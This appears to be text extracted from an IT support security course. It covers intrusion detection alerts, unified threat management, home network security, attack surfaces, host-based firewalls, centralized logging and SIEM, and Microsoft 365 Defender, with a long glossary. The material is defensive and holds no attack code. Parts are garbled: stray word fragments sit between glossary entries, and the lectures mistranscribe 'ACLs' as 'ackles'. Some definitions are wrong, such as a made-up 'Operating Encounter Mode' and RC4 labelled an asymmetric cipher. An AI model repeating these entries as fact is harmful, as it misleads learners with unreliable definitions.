Or it might paid someone in the middle of the night if
it's determined to be a really high severity and urgent.
These alerts would usually also include
reference information linking to
a known vulnerability or
some more information about the nature
of the alert to help
the investigator look into the event.
Well, we covered a lot of ground
on securing your networks.
I hope you feel secure enough to move on.
If not, you can review any
of these concepts that we've talked about.
Supplemental reading for Intrusion

Detection/Prevention System
Snort: https://www.snort.org/
Suricata: https://suricata-ids.org/
The Bro Network Security Monitor has recently been renamed to the Zeek Network Security
Monitor: https://www.zeek.org/
Unified Threat Management (UTM)

Unified Threat Management (UTM)
Previously, you learned about several network security topics, including network hardening best practices,
firewall essentials, and the foundations of IEEE 802.1X. In this reading, you will learn about a robust
solution for network security, Unified Threat Management (UTM), along with its features, benefits, and
risks.
UTM solutions stretch beyond the traditional firewall to include an array of network security tools with a
single management interface. UTM simplifies the configuration and enforcement of security controls and
policies, saving time and resources. Security event logs and reporting are also centralized and simplified to
provide a holistic view of network security events.
UTM options and configurations
UTM solutions are available with a variety of options and configurations to meet the network security
needs of an organization:
UTM hardware and software options:
 Stand-alone UTM network appliance

 Set of UTM networked appliances or devices
 UTM server software application(s)
Extent of UTM protection options:
 Single host
 Entire network
UTM security service and tool options can include:
 Firewall: Can be the first line of defense in catching phishing attacks, spam, viruses, malware, and
other potential threats that attempt to access an organization’s network. Firewalls can be
hardware devices or software applications. Firewalls filter and inspect packets of data attempting
to enter and exit a managed network. Rules can be configured to permit or prevent certain types of
packets from entering the network.
 Intrusion detection system (IDS): Passively monitors packets of data and network traffic for
unusual patterns that could indicate an attack. IDS devices can monitor entire networks (NIDS) or
just a single host (HIDS). IDS identifies, logs, and alerts IT Support about suspicious traffic.
However, IDS does not prevent an attack from occurring. This system gives IT Support
professionals the opportunity to inspect flagged events to determine how to handle the threat on a
case by case basis.
 Intrusion prevention system (IPS): Actively monitors packets and network traffic for potential
malicious attacks. IPS systems can be configured to automatically block attacks or to allow
manual interventions. IPS devices can monitor entire networks (NIPS) or just a single host (HIPS).
 Antivirus software: Uses a signature database to obtain the profiles of malicious files, such as
spyware, Trojans, malware, worms, and more. The antivirus software monitors the organization’s
network and systems for these virus signatures. Once identified, the software will block,
quarantine, or destroy them.
 Anti-malware software: Scans information streams for known malicious malware signatures and
blocks threats. Additionally, anti-malware software can use heuristic analysis to detect novel
malware threats by identifying key behaviors and characteristics. The software can also use
sandboxing to isolate suspicious files.
 Spam gateway: Filters, identifies, and quarantines spam email. Spam gateways are network
servers that use Domain Name Server (DNS) management tools to protect against spam.
 Web and content filters: Block user access to risky and malicious websites. When a user attempts
to access an unauthorized or suspicious website using a browser, the UTM web filter can prevent
the website from loading. The filter can also be customized to block certain types of websites or
specific URLs, like social media or other websites that might be a distraction in the workplace.
 Data leak/loss prevention (DLP): Monitors outgoing network traffic for personal, sensitive, and
confidential data. DLP includes a verification system to determine if the external data transfer is
authorized or malicious, and can block unauthorized attempts.
 Virtual Private Network (VPN): Encrypts data and creates a private “tunnel” to safely transmit
the data through a public network.
Stream-based vs. proxy-based UTM inspections
UTM solutions offers two methods for inspecting packets in UTM firewalls, IPS, IDS, and VPNs:
 Stream-based inspection, also called flow-based inspection: UTM devices inspects data samples
from packets for malicious content and threats as the packets flow through the device in a stream
of data. This process minimizes the duration of the security inspection, which keeps network data
flowing at a faster rate than a proxy-based inspection.
 Proxy-based inspection: A UTM network appliance works as a proxy server for the flow of network
traffic. The UTM appliance intercepts packets and uses them to reconstruct files. Then the UTM
device will analyze the file for threats before allowing the file to continue on to its intended
destination. Although this security screening process is more thorough than the stream-based
inspection technique, proxy-based inspections are slower in the transmission of data.
Benefits of using UTM
UTM solutions can offer multiple benefits to an organization:
 UTM can be cost-effective: Reduces the time and resources needed to manage multiple stand-
alone security tools. Purchasing a suite of integrated tools may also be less expensive than buying
each tool separately.
 UTM is flexible and adaptable: Offers flexible solutions and options for security management.
The security services and tools in a UTM can be implemented in any combination that is
appropriate for each network environment.
 UTM offers integrated and centralized management: Consolidates multiple security tools into a
central management console. This simplifies monitoring and addressing security threats, as well
as streamlines the management of updates to the UTM components. The central management
feature also helps IT Support staff identify and stop the full extent of an attack across an entire
network.
Risks of using UTM
 UTM can become a single point of failure in a network security attack: If an attack disables an
entire UTM solution, there would be no other backup security services or tools to stop that attack.
One of the core principles of information systems management is to design and implement
redundant, backup, and failover systems. When one element of an IT system is attacked or
experiences a failure, there should always be a backup or parallel system to replace it.
 UTM might be a waste of resources for small businesses: Small businesses may not need a robust
security solution like UTM. The time and money needed to purchase, implement, and manage a
complex UTM system may not provide a significant return on security benefits for a smaller
network. Cybercriminals are more likely to attack larger targets.
Key takeaways
 Unified Threat Management (UTM) systems offer multiple options in a comprehensive suite of
network security tools. UTM solutions can be implemented as hardware and/or software and can
protect either a single host or an entire network.
 UTM security services and tool options include firewalls, IDS, IPS, antivirus and anti-malware
software, spam gateways, web and content filters, data leak/loss prevention, and VPN services.
 The benefits of using a UTM solution include having a cost-effective network security system that is
flexible and adaptable with a management console that is integrated and centralized. The risks of
using UTM include creating a single point of failure for a network security system and it might be
an unnecessary use of resources for small businesses.
Home Network Security

Home Network Security
Employees who work from home use home networks to access company files and programs. Using home
networks creates security challenges for companies. Companies can provide employees guidance for
protecting their home networks from attacks. This reading will cover common attacks on home networks
and steps to make home networks more secure.
Common security vulnerabilities

Home networks have vulnerabilities to various types of attacks. The most common security attacks on
home networks include:
 Meddler in the middle attacks allows a meddler to get between two communication devices or
applications. The meddler then replies as the sender and receiver without either one knowing they
are not communicating with the correct person, device, or application. These attacks allow the
meddler to obtain login credentials and other sensitive information.
 Data Theft is when data within the network is stolen, copied, sent, or viewed by someone who
should not have access.
 Ransomware uses malware to keep users from accessing important files on their network. Hackers
grant access to the files after receiving a ransom payment.
Keeping home networks secure

To protect company data, employees working from home need to take steps to improve the security of
their home networks. Home networks can have added protection without expensive equipment or
software.
Employees can take steps to keep home networks more secure:
 Change the default name and password using the same password guidelines as your company.
 Limit access to the home network by not sharing access credentials outside of trusted
individuals.
 Create a guest network that allows guests to connect to the internet but not your other devices.
 Turn on WiFi network encryption requiring a password before a device can access the internet.
 Turn on the router’s firewall to prevent unwanted traffic from entering or leaving your wireless
network without your knowledge. Regularly update your router firmware.
 Update to the newest WiFi standard which is the most secure standard for home WiFi.
Another security measure that a company can take is for employees to work over a virtual private network,
or VPN. Using a VPN creates an encrypted, secure internet connection through which employees can
access company data.
Key takeaways
Home network security is vital to protect a company’s sensitive information when employees work from
home.
 Data theft, ransomware, and meddler in the middle are common attacks on home networks.
 Employees working from home need to take steps to improve the security of their home networks.
Module 4 Glossary
Activation threshold: Triggers a pre-configured action when it is reached and will typically
block the identified attack traffic for a specific amount of time
Analyzing logs: The practice of collecting logs from different network and sometimes client
devices on your network, then performing an automated analysis on them
CCMP (counter mode CBC-MAC protocol): A mode of operation for block ciphers that
allows for authenticated encryption
Correlation analysis: The process of taking log data from different systems, and matching
events across the systems
Dynamic ARP inspection (DAI): A feature on enterprise switches that prevents certain types
of attacks
EAP-TLS: One of the more common and secure EAP methods
Extensible authentication protocol (EAP over LAN, or EAPOL): A standard authentication

protocol
Fail to ban: A common open source flood guard protection tool
Flood guards: Provide protection against DoS or Denial of Service Attacks
Four-Way Handshake: It is designed to allow an AP to confirm that the client has the correct
pairwise master key in a WPA-PSK setup without disclosing the PMK
GTK (Groupwise Transient Key): A temporal key, which is actually used to encrypt data
Hubs: Devices that serve as a central location through which data travels through; a quick
and dirty way of getting packets mirrored to your capture interface
Implicit deny: A network security concept where anything not explicitly permitted or allowed
should be denied
Intrusion detection and intrusion protection systems (IDS/IPS): Operates by monitoring

network traffic and analyzing it
IP source guard (IPSG): It can be enabled on enterprise switches along with DHCP snooping
Logs analysis systems: They are configured using user-defined rules to match interesting or
atypical log entries
Monitor mode: It allows to scan across channels to see all wireless traffic being sent by APs
and clients
Network hardening: Is the process of securing a network by reducing its potential

vulnerabilities through configuration changes, and taking specific steps
Network separation (network segmentation): A good security principle for an IT support

specialists to implement. It permits more flexible management of the network, and provides
some security benefits. This is the concept of using VLANs to create virtual networks for
different device classes or types
Network software hardening: Includes things like firewalls, proxies, and VPNs
OES (Operating Encounter Mode): It turns a block cipher into a stream cipher by using a
random seed value along with an incrementing counter to create a key stream to encrypt
data with
Packet sniffing (packet capture): the process of intercepting network packets in their
entirety for analysis
Pairwise Transient Key (PTK): It is generated using the PMK, AP nonce, Client nonce, AP
MAC address, and Client MAC address
PBKDF2 (Password Based Key Derivation Function 2): Password Based Key Derivation
Function 2
PIN authentication method: It uses PINs that are eight-digits long, but the last digit is a
checksum that's computed from the first seven digits
Port mirroring: Allows the switch to take all packets from a specified port, port range, or the
entire VLAN and mirror the packets to a specified switch port
Post-fail analysis: Investigating how a compromise happened after the breach is detected
Pre-shared key: It's the Wi-Fi password you share with people when they come over and
want to use your wireless network
Promiscuous mode: A type of computer networking operational mode in which all network
data packets can be accessed and viewed by all network adapters operating in this mode
Proxy: Can be useful to protect client devices and their traffic. They also provide secure
remote access without using a VPN
Rainbow tables: A pre-computed table of all possible password values and their
corresponding hashes
Reverse proxy: A service that might appear to be a single server to external clients, but
actually represents many servers living behind it
Rogue DHCP server attack: An attacker can hand out DHCP leases with whatever
information they want by deploying a rogue DHCP server on your network, setting a gateway
address or DNS server, that's actually a machine within their control
Tcpdump: It's a super popular, lightweight command-line based utility that you can use to
capture and analyze packets
TKIP (Temporal Key Integrity Protocol): To address the shortcomings of WEP security
VPNs: Commonly used to provide secure remote access, and link two networks securely
WEP (Wired Equivalent Privacy): First security protocol introduced for Wi-FI networks
Wireshark: It's another packet capture and analysis tool that you can use, but it's way more
powerful when it comes to application and packet analysis, compared to tcpdump
WPA (Wi-fi protected access): Designed as a short-term replacement that would be

compatible with older WEP-enabled hardware with a simple firmware update
WPA2 Enterprise: It's an 802.1x authentication to Wi-Fi networks
WPS (Wifi Protected Setup): It's a convenience feature designed to make it easier for clients
to join a WPA-PSK protected network
802.1x: It is the IEEE standard for encapsulating EAP or Extensible Authentication Protocol
traffic over the 802 networks
802.1X with EAP-TLS: Offers arguably the best security available, assuming proper and
secure handling of the PKI aspects of it

A
Accounting: Keeping records of what resources and services your users access or what they
did when they were using your systems
Advanced Encryption Standard (AES): The first and only public cipher that's approved for
use with top secret information by the United States National Security Agency
Authorization: It pertains to describing what the user account has access to or doesn't have
access to
should have it
something

Block ciphers: The cipher takes data in, places that into a bucket or block of data that's a
fixed size, then encodes that entire block as one unit
CA (Certificate authority): It's the entity that's responsible for storing, issuing, and signing
certificates. It's a crucial component of the PKI system
Caesar cipher: A substitution alphabet, where you replace characters in the alphabet with
others usually by shifting or rotating the alphabet, a set of numbers or characters
CBC-MAC (Cipher block chaining message authentication codes): A mechanism for

building MACs using block ciphers
Central repository: It is needed to securely store and index keys and a certificate
management system of some sort makes managing access to storage certificates and
issuance of certificates easier
Certificate fingerprints: These are just hash digests of the whole certificate, and aren't
actually fields in the certificate itself, but are computed by clients when validating or
inspecting certificates
Certificate Revocation List (CRL): A means to distribute a list of certificates that are no
longer valid
longer valid
Certificate Signature Algorithm: This field indicates what public key algorithm is used for
the public key and what hashing algorithm is used to sign the certificate
Certificate-based authentication: It is the most secure option, but it requires more support
and management overhead since every client must have a certificate
Client certificates: They operate very similarly to server certificates but are presented by
clients and allow servers to authenticate and verify clients
CMACs (Cipher-based Message Authentication Codes): The process is similar to HMAC, but
instead of using a hashing function to produce a digest, a symmetric cipher with a shared
keys used to encrypt the message and the resulting output is used as the MAC
Code signing certificates: It is used for signing executable programs and allows users of these
signed applications to verify the signatures and ensure that the application was not tampered
with
Counter-based tokens: They use a secret seed value along with the secret counter value
that's incremented every time a one-time password is generated on the device
Cryptographic hashing: It is distinctly different from encryption because cryptographic hash

functions should be one directional
Cryptography: The overarching discipline that covers the practice of coding and hiding
messages from third parties
Cryptosystem: A collection of algorithms for key generation and encryption and decryption
operations that comprise a cryptographic service
Data binding and sealing: It involves using the secret key to derive a unique key that's then
used for encryption of data
Data information tree: A structure where objects will have one parent and can have one or
more children that belong to the parent object
Decryption: The reverse process from encryption; taking the garbled output and
transforming it back into the readable plain text
DSA (Digital Signature Algorithm): It is another example of an asymmetric encryption

system, though its used for signing and verifying data
Eliptic curve cryptography (ECC): A public key encryption system that uses the algebraic
structure of elliptic curves over finite fields to generate secure keys
Encapsulating security payload: It's a part of the IPsec suite of protocols, which
encapsulates IP packets, providing confidentiality, integrity, and authentication of the
packets
Encryption algorithm: The underlying logic or process that's used to convert the plaintext
into ciphertext
Encryption: The act of taking a message (plaintext), and applying an operation to it (cipher),
so that you receive a garbled, unreadable message as the output (ciphertext)

protocol
FIPS (Federal Information Processing Standard): The DES that was adopted as a federal
standard for encrypting and securing government data
Forward secrecy: This is a property of a cryptographic system so that even in the event that
the private key is compromised, the session keys are still safe
Frequency analysis: The practice of studying the frequency with which letters appear in
ciphertext
Hashing (Hash function): A type of function or operation that takes in an arbitrary data input
and maps it to an output of a fixed size, called a hash or a digest
HMAC (Keyed-Hash Message Authentication Codes): It uses a cryptographic hash function

along with a secret key to generate a MAC
HTTPS: Hypertext Transfer Protocol Secure is a secure version of HTTP that ensures the
communication your web browser has with the website is secured through encryption
Intermediary (subordinate) CA: It means that the entity that this certificate was issued to
can now sign other certificates
IPsec (Internet Protocol security): A VPN protocol that was designed in conjunction with
IPv6
Kerberos: A network authentication protocol that uses tickets to allow entities to prove their
identity over potentially insecure channels to provide mutual authentication
Kerckhoff's principle: A principle that states that a cryptosystem, or a collection of

algorithms for key generation and encryption and decryption operations that comprise a
cryptographic service should remain secure, even if everything about the system is known
except for the key
Key signing parties: Organized by people who are interested in establishing a web of trust,
and participants perform the same verification and signing
Lightweight Directory Access Protocol (LDAP): An open industry-standard protocol for

accessing and maintaining directory services; the most popular open-source alternative to
the DAP
MACs (Message Authentication Codes): A bit of information that allows authentication of a

received message, ensuring that the message came from the alleged sender and not a third
party masquerading as them
MD5: A popular and widely used hash function designed in the early 1990s as a
cryptographic hashing function
Multifactor authentication (MFA): A system where users are authenticated by presenting

multiple pieces of information or objects
OAuth: An open standard that allows users to grant third-party websites and applications
access to their information without sharing account credentials
One-time password (OTP): A short-lived token, typically a number that's entered along with
a username and password
OpenID: An open standard that allows participating sites known as Relying Parties to allow
authentication of users utilizing a third party authentication service
Organizational units (OUs): Folders that let us group related objects into units like people or
groups to distinguish between individual user accounts and groups that accounts can belong
to
Password salt: Additional randomized data that's added into the hashing function to
generate the hash that's unique to the password and salt combination
PGP (Pretty Good Privacy) encryption: An encryption application that allows

authentication of data along with privacy from third parties relying upon asymmetric
encryption to achieve this
Physical tokens: They take a few different forms, such as a USB device with a secret token on
it, a standalone device which generates a token, or even a simple key used with a traditional
lock
Public key signatures: Digital signature generated by composing the message and
combining it with the private key
RA (Registration Authority): It is responsible for verifying the identities of any entities

requesting certificates to be signed and stored with the CA
Rainbow table attacks: To trade computational power for disk space by pre-computing the
hashes and storing them in a table
Random numbers: A very important concept in encryption because it avoids some kind of
pattern that an adversary can discover through close observation and analysis of encrypted
messages over time
sort of ransom
RC4 (Rivest Cipher 4): Asymmetric stream cipher that gained widespread adoption because
of its simplicity and speed
Remote attestation: The idea of a system authenticating its software and hardware
configuration to a remote system
Remote Authentication Dial-in User Service (RADIUS): A protocol that provides AAA
services for users on a network
Risk mitigation: Understanding the risks your systems face, take measures to reduce those
risks, and monitor them
Root certificate authority: They are self signed because they are the start of the chain of
trust, so there's no higher authority that can sign on their behalf
RSA: One of the first practical asymmetric cryptography systems to be developed, named for
the initials of the three co-inventors: Ron Rivest, Adi Shamir and Leonard Adleman
Secure channel: It is provided by IPsec, which provides confidentiality, integrity, and

authentication of data being passed
Secure element: It's a tamper resistant chip often embedded in the microprocessor or
integrated into the mainboard of a mobile device
Secure Shell (SSH): A secure network protocol that uses encryption to allow access to a
network service over unsecured networks
Security keys: Small embedded cryptoprocessors, that have secure storage of asymmetric
keys and additional slots to run embedded code
Security through obscurity: The principle that if no one knows what algorithm is being used
or general security practices, then one is safe from attackers
Self-signed certificate: This certificate has been signed by the same entity that issued the
certificate
Serial number: A unique identifier for their certificate assigned by the CA which allows the CA
to manage and identify individual certificates
Session key: The shared symmetric encryption key using TLS sessions to encrypt data being
sent back and forth
SHA1: It is part of the secure hash algorithm suite of functions, designed by the NSA and
published in 1995
Shannon's maxim: It states that the system should remain secure, even if your adversary
knows exactly what kind of encryption systems you're employing, as long as your keys remain
secure
Single Sign-on (SSO): An authentication concept that allows users to authenticate once to be
granted access to a lot of different services and applications
of computers
database
SSL/TLS Client Certificate: Certificates that are bound to clients and are used to
authenticate the client to the server, allowing access control to a SSL/TLS service
SSL/TLS Server Certificate: A certificate that a web server presents to a client as part of the
initial secure setup of an SSL, TLS connection
Stream ciphers: It takes a stream of input and encrypts the stream one character or one digit
at a time, outputting one encrypted character or digit at a time
Subject Public Key Info: These two subfields define the algorithm of the public key along
with the public key itself
Subject: This field contains identifying information about the entity the certificate was issued
to
Substitution cipher: An encryption mechanism that replaces parts of your plaintext with
ciphertext
Symmetric key algorithm: Encryption algorithms that use the same key to encrypt and
decrypt messages
TACACS+: It is a device access AAA system that manages who has access to your network
devices and what they do on them
Ticket granting service (TGS): It decrypts the Ticket Granting Ticket using the Ticket
Granting Service secret key, which provides the Ticket Granting Service with the client Ticket
Granting Service session key
TLS 1.2 with AES GCM: A specific mode of operation for the AES block cipher that
essentially turns it into a stream cipher
TLS Handshake: A mechanism to initially establish a channel for an application to

communicate with a service
TPM (Trusted Platform Module): This is a hardware device that's typically integrated into
the hardware of a computer, that's a dedicated crypto processor
Transport mode: One of the two modes of operations supported by IPsec. When used, only
the payload of the IP packet is encrypted, leaving the IP headers untouched
Trusted execution environment (TEE): It provides a full-blown isolated execution

environment that runs alongside the main OS
Tunnel mode: One of the two modes of operations supported by IPsec. When used, the entire
IP packet, header, payload, and all, is encrypted and encapsulated inside a new IP packet
with new headers
Tunnel: It is provided by L2TP, which permits the passing of unmodified packets from one
network to another
U
U2F (Universal 2nd Factor): It's a standard developed jointly by Google, Yubico and NXP
Semiconductors that incorporates a challenge-response mechanism, along with public key
cryptography to implement a more secure and more convenient second-factor
authentication solution
Username and password authentication: Can be used in conjunction with certificate

authentication, providing additional layers of security
Validity: This field contains two subfields, Not Before and Not After, which define the dates
when the certificate is valid for
VPN (Virtual Private Network): A secure method of connecting a device to a private

network over the internet
Web of trust: It is where individuals instead of certificate authorities sign other individuals'
public keys
network
X.509 standard: It is what defines the format of digital certificates, as well as a certificate
revocation list or CRL
XTACACS: It stands for Extended TACACS, which was a Cisco proprietary extension on top
of TACACS
Z
The potential for these unknown flaws is something you should think about when
looking to secure your company's systems and networks.
Even though it's an unknown risk,
it can still be handled by taking measures to restrict and control access to systems.
Our end goal overall is risk reduction.
Two important terms to know when talking about security risks are attack vectors
and attack surfaces.
An attack vector is a method or mechanism by which an attacker or
malware gains access to a network or system.
Some attack vectors are email attachments, network protocols or
services, network interfaces and user input.
These are different approaches or paths that an attacker could use to compromise
the system, if they're able to exploit it.
And attack surface is the sum of all the different attack vectors in a given
system.
Think of this as the combination of all possible ways
an attacker could interact with our system regardless of known vulnerabilities.
It's not possible to know of all vulnerabilities in the system, so
make sure to think of all avenues that an outside actor could interact with our
systems as a potential attack surface.
The main takeaway here is to keep our attack surfaces as small as possible.
This reduces the chances of an attacker discovering an unknown flaw and
compromising our systems.
There are lots of approaches you can use as an IT support specialist to reduce
attack surfaces, all of them boiled down to simplifying systems and services.
The less complex something is, the less likely there will be undetected flaws.
So make sure to disable any extra services or protocols,
if they're not totally necessary, then get them out of there.
Every additional surface that's operating represents additional attack surfaces that
could have an undiscovered vulnerability.
That vulnerability could be exploited and lead to compromise.
This concept also applies to access in hackles,
only allow access when totally necessary.
So for example, it's probably not necessary for employees to be able to
access printers directly from outside of the local network.
You can just adjust firewall rules to prevent that type of access.
Another way to keep things simple is to reduce your software deployments.
Instead of having five different software solutions to accomplish five separate
tasks, replace them with one unified solution, if you can.
That one solution should require less complex code which
reduces the number of potential vulnerabilities.
You should also make sure to disable unnecessary or
unused components of software and systems deployed.
By disabling features not in use,
you're reducing even more attack surfaces even more.
You're not only reducing the number of ways an attacker can get in, but
you're also minimizing the amount of code that's active.
We briefly mentioned host-based firewalls when we

talked about network monitoring
and intrusion detection systems.
Host-based firewalls are important
to creating multiple layers of security.
They protect individual hosts from being
compromised when they're used in untrusted,
and potentially malicious environments.
They also protect individual hosts from
potentially compromised peers inside a trusted network.
Our network-based firewall has a duty to protect
our internal network by
filtering traffic in and out of it.
While the host-based firewall on each individual host,
protects that one machine.
Like our network-based firewall,
we'd still want to start with an implicit deny rule,
then we'd selectively enable
specific services and ports that'll be used.
This lets us start with a secure default,
and then only permits traffic that we know and trust.
You can think of this as starting with
a perfectly secure firewall configuration
and then poking holes in it for
the specific traffic we require.
This may look very different from
your network firewall configuration,
since it's unlikely that your employees would need
remote SSH access to their laptops, for example.
Remember that to secure systems,
you need to minimize attack surfaces or exposure.
A host-based firewall plays a big part
in reducing what's accessible to an outside attacker.
It provides flexibility while
only permitting connections to
selective services on a given host
from specific networks or IP ranges.
This ability to restrict
connections from certain origins,
is usually used to implement
a highly secure host to network.
From there, access to
critical or sensitive systems
or infrastructure is permitted.
These are called bastion hosts or networks,
and are specifically hardened and
minimized to reduce what's permitted to run on them.
Bastion hosts are usually exposed to the Internet,
so you should pay special attention to hardening and
locking them down to reduce the chances of compromise.
But they can also be used as a gateway or access portal
into more sensitive services like
core authentication servers or domain controllers.
This would let you implement
more secure authentication mechanisms and
ackles on the bastion hosts without
making it inconvenient for your entire company.
Monitoring and logging can be
prioritized for these hosts more easily.
Typically, these hosts or networks would
also have severely limited network connectivity.
It's usually just to the secure zone
that they're designed to protect and not much else.
Applications that are allowed to be
installed and run on these hosts,
would also be restricted to those that are strictly
necessary since these machines have one specific purpose.
Part of the host-based firewall rules will likely also
provide ackles that allow access from the VPN subnet.
It's good practice to keep the network that VPN clients
connect into separate using both subnetting and VLANs.
This gives you more flexibility to
enforce security on these VPN clients.
It also lets you build additional layers of defenses.
While a VPN host should be protected using other means,
it's still a host that's operating
in a potentially malicious environment.
This host is then initiating
a remote connection into your trusted internal network.
These hosts represent another potential vector
of attack and compromise.
Your ability to separately monitor traffic
coming and going from them is super useful.
There's an important thing for you to consider
when it comes to host-based firewalls,
especially for clients systems like laptops.
If the users of the system
have administrative rights than
they have the ability to change
firewall rules and configurations.
This is something you should keep in
mind and make sure to monitor with logging.
If management tools allow it,
you should also prevent
the disabling of the host-based firewall.
This can be done with Microsoft Windows machines when
administered using Active Directory as an example.
A critical part of any security architecture is logging and alerting.

It wouldn't do much good to have all these defenses in place.
If we have no idea if they're working or not, we need visibility into the security
systems in place to see what kind of traffic they're seeing.
We also need to have the visibility into the logs of all of our infrastructure
devices and equipment that we manage but it's not enough to just have logs.
We also need ways to safeguard logs and make them easy to analyze and review.
If there's a dedicated security team at your company,
they would be performing this analysis but
at a smaller company this responsibility would likely fall to the IT team.
So let's make sure you're prepared with the skills you might need for
incident investigation.
Many investigative techniques can also be applied to troubleshooting.
All systems and services running on hosts will create logs of some kind with
different levels of detail.
It depends on what its logging and what events it's configured to log.
So an authentication server would log every authentication attempt whether it's
successful or not.
A firewall would log traffic that matches rules with details like source and
destination addresses and ports being used.
All this log information gives us details about the traffic and
activity that's happening on our network and systems.
This can be used to detect compromise or attempts to attack the system.
When there are a large number of systems located around your network,
each with their own log format,
it can be challenging to make meaningful sense of all this data.
This is where security information and event management systems or SIEMS come in.
A SIEM can be thought of as a centralized log server it is some extra analysis
features too.
You can think of SIEM as a form of centralized logging for
security administration purposes.
A SIEM system gets logs from a bunch of other systems.
It consolidates the logs from all different places and
places it in one centralized location.
This makes handling logs a lot easier.
As an IT support specialist an important step you'll take in logs
analysis is normalization.
This is the process of taking log data in different formats and converting it into
a standardized format that's consistent with a defined log structure.
As an IT support specialist you might configure normalization for
your log sources.
For example, log entries from our firewall may have a timestamp using a year,
month and day format.
While logs from our client machines may use day, month, year format.
To normalize this data, you choose one standard date format then you
define what the fields are for the log types that need to be converted.
When logs are received from these machines, the log entries
are converted into the standard that we defined and stored by the logging server.
This lets you analyze and compare log data between different log types and
systems in a much easier fashion.
So what type of information should you be logging?
Well that's a great question.
If you log too much info, it's difficult to analyze the data and
find useful information plus storage requirements for
saving the logs become expensive very quickly.
But if you log too little then the information won't provide any useful
insights into your systems and network.
Finding that middle ground can be difficult.
It will vary depending on the unique characteristics of the systems being
monitored and the type of activity on the network.
No matter what events are logged, all of them should have information that will
help understand what happened and reconstruct the events.
There are lots of important fields to capture and log entries like timestamp,
the event or error code, the service or application being logged.
The user or system account associated with the event and
the devices involved in the event.
Timestamps are super important to understanding when an event occurred.
Fields like source and
destination addresses will tell us who was talking to whom.
For application logs you can grab useful information from the logged
in user associated with the event and from what client they used.
On top of the analysis assistance it provides a centralized log server also has
security benefits.
By maintaining logs on a dedicated system,
it's easier to secure the system from attack.
Logs are usually targeted by attackers after a breach so
that they can cover their tracks.
By having critical systems send logs to remote logging server that's locked down,
the details of a breach should still be logged.
A forensics team will be able to reconstruct the events that led to
the compromise.
Once we have logging configured and
the relevant events recorded on a centralized log server, what do we do with
all the data while analyzing log details depends on what you're trying to achieve.
Typically when you look at aggregated logs as an IT support specialist,
you should pay attention to patterns and connections between traffic.
So if you're seeing a large percentage of Windows hosts,
all connecting to specific address outside your
network that might be worth investigating, it could signal a malware infection.
Once logs are centralized and
standardized you can write automated alerting based on rules.
Maybe you'll want to define an alert rule for repeated unsuccessful
attempts to authenticate to a critical authentication server.
Lots of SIEM solutions also offer handy dashboards to help analysts visualize
this data.
Having data in a visual format can potentially provide more insight.
You can also write some of your own monitoring and alert systems.
Now it doesn't matter if you're using a SIEM solution or writing your own.
It can be useful to break down things like commonly used protocols in the network.
Quickly see the top talkers in the network and
view reported errors over time to reveal patterns.
Another important component to logging to keep in mind as an IT support specialist
is retention.
Your log storage needs will vary based on the amount of systems being logged.
The amount of detail logs and the rate at which logs are created,
how long you want or need to keep logs around will also really influence
the storage requirements for a log server.
Some examples of logging servers and SIEM solutions are the open source, rsyslog,
Splunk Enterprise Security, IBM Security Qradar and RSA Security Analytics.
Supplemental Reading for Logging and

Auditing
There are a variety of logging server and SIEM solutions you can explore.
If you're interested in open source solutions, check out rsyslog here.
If you're interested in enterprise solutions, check out Splunk Enterprise Security here
and IBM Security Qradar here.
Windows Defender Guide

Microsoft 365 Defender
Previously, you learned about system hardening and critical elements in security architecture. In this
reading, you will learn how Microsoft 365 Defender can be used within an organization for expanded
security services and tools. You will also learn about User Account Control (UAC) and its importance in
endpoint security.
Microsoft 365 Defender services
Preventing threats across an enterprise environment can be challenging for IT Support professionals.
Microsoft 365 Defender can help to simplify this responsibility. Defender provides enterprise-wide security
through an integrated suite of tools. It offers tools to prevent attacks, detect threats, investigate security
breaches, and coordinate effective response strategies. The Defender portal also offers an action center for
monitoring incidents and alerts, as well as for threat hunting and analytics.
Microsoft 365 Defender protection and services include:
 Defender for Endpoint: Protects network endpoints including servers, workstations, mobile
devices, and IoT devices. Provides preventative safeguards, breach detections, automated
analyses, and threat response services.
 Defender Vulnerability Management: Protects assets including, hardware, software, licenses,
networks, and data. Provides asset inventory, vulnerability discovery, configuration assessment,
risk-based prioritization, and remediation tools.
 Defender for Office 365: Protects Microsoft 365 (formerly Office 365), including Exchange,
Outlook, files, and attachments. Guards against malicious threats entering from email messages,
links (URLs), and collaboration tools.
 Defender for Identity: Protects user identities and credentials. Detects, identifies, and
investigates advanced threats, compromised identities, and malicious actions performed using
stolen user identities or by internal threats.
 Azure Active Directory Identity Protection: Protects cloud-based identities in Azure by
automating detection and resolutions for identity risks.
 Defender for Cloud Apps: Protects cloud applications by providing deep visibility searches,
robust data controls, and advanced threat protection.
Using Microsoft 365 Defender
As an IT Support professional in an organization, you might use Microsoft 365 Defender to monitor your
enterprise’s IT security. You can customize the Defender portal Home page by job roles. Various security
cards can be selected to appear on the Home page for your role. For example, you might see cards for
monitoring:
 Identities: Monitor user identities for suspicious or risky behaviors.

 Data: Track user activity that is risky to data security.
 Devices: See alerts, breach activity, and other threats on devices connected to the organization’s
network.
 Apps: Observe how cloud apps are being used in your organization.
 Incidents: Review attacks through compiled comprehensive incident data.
 Alerts: View alerts compiled from across the Microsoft 365 suite.
 Advanced hunting: Scan for suspicious files, malware, and risky activities.
 Threat Analytics: View information about current cybersecurity threats.
 Secure score: Get a calculated score for your security configuration and recommendations on how
to improve your score.
 Learning hub: Easily access Microsoft 365 security tutorials and other learning materials.
 Reports: Obtain information to help you better protect your organization.
Microsoft 365 Defender aggregates and organizes this monitoring data to provide IT Support professionals
details on where attacks began, which malicious tactics were used, the scope of the attacks, and other
related incident information.
Microsoft 365 Defender in action
The following are examples of how a cyberattack might penetrate and infect an enterprise network. For
each type of malicious attack, a potential Microsoft 365 Defender response follows, illustrating how the
security suite could respond:
 A phishing attempt enters through email: An employee in an organization receives an email from
a business that appears to be legitimate, like a bank. The email might claim that there is a problem
with the employee’s account and that they must click on a given link to resolve the problem.
However, the phishing email actually contains a link to a malicious website that a cybercriminal
disguised to look like a real bank. If the employee clicks on the link to view the website, the site
requests that the user enter their account credentials or other sensitive information. This
information is then transmitted to the cybercriminal. Microsoft Defender for Office 365 detects
the emailed phishing scam by monitoring Exchange and Outlook. Both the employee and the IT
Support team are alerted about this attempted phishing attack.
 Malware enters through social media: An employee clicks on an enticing link posted on their
favorite social media app. The link triggers an automatic download of a malware file to the
employee’s laptop. Microsoft Defender for Endpoint monitors the employee’s laptop for
suspicious malware signatures. Upon detecting the malware, Defender for Endpoint alerts the
employee and the organization’s IT Support team about the malware and discloses its endpoint
location.
